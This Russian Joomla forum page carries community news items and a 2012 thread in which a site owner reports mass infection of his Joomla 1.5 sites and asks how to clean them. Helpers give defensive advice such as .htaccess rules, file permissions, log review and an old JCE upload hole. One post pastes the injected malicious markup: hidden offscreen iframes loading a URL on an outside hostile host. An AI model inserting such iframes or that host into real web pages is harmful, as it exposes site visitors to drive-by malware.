Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 2872 Просмотров
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Инфицирование сайтов на Joomla
« : 21.12.2012, 16:18:09 »
У меня на аккаунтах Timeweb находятся более 100 сайтов.
С 19 числа более 20 сайтов были заражены. В папку images/stories были внедрены какие то php файлы и картинки и с сайтов рассылался спам.
Браузеры на сайты ставят заглушку с предупреждением.
Служба поддержки просто бросает трубку даже не вникнув в суть вопроса.
Вопрос к тем кто в курсе. Какие новые вирусы могли появиться для Joomla 1.5.22 и 23 версий.
Как их автоматически удалять с сайтов - не на всех сайтах был бекап.
« Последнее редактирование: 21.12.2012, 18:00:48 от _ib_ »
Записан
*

SmiP

  • Захожу иногда
  • 265
  • 35 / 0
Re: Массовое инфицирование сайтов на Joomla
« Ответ #1 : 21.12.2012, 16:56:18 »
Посмотрите вот это
http://www.opennet.ru/opennews/art.shtml?num=35583
Записан
*

Град

  • Захожу иногда
  • 152
  • 67 / 0
  • В Багдаде все спокойно
Re: Массовое инфицирование сайтов на Joomla
« Ответ #2 : 21.12.2012, 17:32:25 »
Цитата: Stich SPb от 21.12.2012, 16:18:09
Какие новые вирусы могли появиться для Joomla 1.5.22 и 23 версий.


а может всетаки через компоненты ломают  ?   ;)


зы:  название темы уж больно страшное
Записан
СИЛЬНЫЙ ЕСТ ВКУСНОГО !
*

_ib_

  • Давно я тут
  • 673
  • 100 / 8
Re: Массовое инфицирование сайтов на Joomla
« Ответ #3 : 21.12.2012, 17:55:23 »
в папке images/stories/ , да и влюбой другой папке, откуда не должны запускаться PHP, создать .htaccess с содержанием:

<Files ~"\.php$">
Order allow,deny
Deny from all
Satisfy all
</Files>


Это не есть решение проблемы, это как профилактика от ботов, если есть дырочки. Но а так обновляйте Ваши расширения вовремя.
« Последнее редактирование: 21.12.2012, 18:00:21 от _ib_ »
Записан
Легальные шаблоны и дёшево!  + скидки до 50% для шаблонов клуба Joomlart, RocketTheme, Yootheme и Gavick.

при интересе пишите в личку или на мыло: "p" точка "d" собака gmx.de
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #4 : 21.12.2012, 18:10:12 »
А как можно запретить модификацию вирусами скриптов?
Записан
*

_ib_

  • Давно я тут
  • 673
  • 100 / 8
Re: Инфицирование сайтов на Joomla
« Ответ #5 : 21.12.2012, 18:25:20 »
в правах на файлы запретить всем запись, но тогда вы и не сможете обновляться. Перед обновлением можете менять права и после опять убирать чтение запись. На мой взгляд это муторно.
« Последнее редактирование: 21.12.2012, 18:37:26 от _ib_ »
Записан
Легальные шаблоны и дёшево!  + скидки до 50% для шаблонов клуба Joomlart, RocketTheme, Yootheme и Gavick.

при интересе пишите в личку или на мыло: "p" точка "d" собака gmx.de
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Инфицирование сайтов на Joomla
« Ответ #6 : 21.12.2012, 18:31:44 »
Массовую смену прав может Admin Tools
Записан
*

Stich SPb

  • Захожу иногда
  • 231
  • 5 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #7 : 21.12.2012, 21:25:47 »
Не могу найти файл который скрипты модифицирует.
Joomla залил поверх с релиза, компоненты и модули поудалял, шаблон переустановил, картинки вычистил.
Все равно вирус лезет((( Заражает все мгновенно. Как его вычислить? Вот такое безобразие вставляет:

Код
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<script type="text/javascript" src="/media/system/js/caption.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css"/>
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css"/>
<link rel="stylesheet" type="text/css" href="/templates/volvo7/css/template.css" media="screen"/>
<!--[if IE 6]><link rel="stylesheet" href="/templates/volvo7/css/template.ie6.css" type="text/css" media="screen" /><![endif]-->
<!--[if IE 7]><link rel="stylesheet" href="/templates/volvo7/css/template.ie7.css" type="text/css" media="screen" /><![endif]-->
<script type="text/javascript" src="/templates/volvo7/jquery.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>
<script type="text/javascript">jQuery.noConflict();</script>
<script type="text/javascript" src="/templates/volvo7/script.js"/>
<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://qjklhgps.pcanywhere.net/77825a35a.rir?11"/>

Записан
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Re: Инфицирование сайтов на Joomla
« Ответ #8 : 22.12.2012, 05:21:15 »
Цитата: Stich SPb от 21.12.2012, 21:25:47
Не могу найти файл который скрипты модифицирует.
Joomla залил поверх с релиза
Просто заливать "поверх" бессмысленно, т.к. шеллы, как правило, отдельные файлы, не входящие "в комплект" Joomla, и они остались на своём месте. Чтобы найти причину - читайте логи доступа.

Цитата: _ib_ от 21.12.2012, 18:25:20
можете менять права и после опять убирать чтение запись. На мой взгляд это муторно.
Если есть SSH, всё это решается быстро и просто. В примере рекурсивный обход директории /public_html с установкой прав "только чтение" для всех файлов php (синтаксис для BSD)
Код
find /home/xxx/public_html/ -type f -name "*.php" -exec chmod 444 {}
Другой вопрос, что и "защита" это - так себе. Скорее временная затычка на время устранения проблемы. Т.к. если злоумышленник получает права писать в директории, с большой вероятностью он сможет также легко поменять права.
« Последнее редактирование: 22.12.2012, 05:29:35 от WebDisaster »
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Инфицирование сайтов на Joomla
« Ответ #9 : 22.12.2012, 11:25:09 »
ага... именно так. Я могу к примеру менять права
Записан
*

zikkuratvk

  • Глобальный модератор
  • 4824
  • 346 / 2
  • Обслуживаем проекты - дорого.
Re: Инфицирование сайтов на Joomla
« Ответ #10 : 22.12.2012, 11:58:28 »
Если я правильно понял, то проблема скорей всего в JCE старом там есть дыра через нее льют шелы. Если у вас есть шел на хосте, то изменение прав вам врядли поможет, он так же от имени PHP сменит права на папки скорей всего. Есть отличные утилиты, которые ищут залитые шелы... используйте их. Перед началом лечения, смени ftp разнесите сайты на разные аккаунты.
Записан
Хочется уникальное расширение? ===>>>> JoomLine - Разрабатываем расширения под заказ.
Использую хостинг TimeWeb и Reg
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

 Ответов: 1
Просмотров: 3121 		Последний ответ 23.04.2024, 10:06:10
от wishlight
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 4206 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 3982 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Изолирование папок сайтов на OpenServer

Автор Lemady

 Ответов: 41
Просмотров: 8403 		Последний ответ 29.11.2021, 15:47:31
от KoreshS
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

 Ответов: 5
Просмотров: 2912 		Последний ответ 13.09.2021, 09:23:28
от Oleg+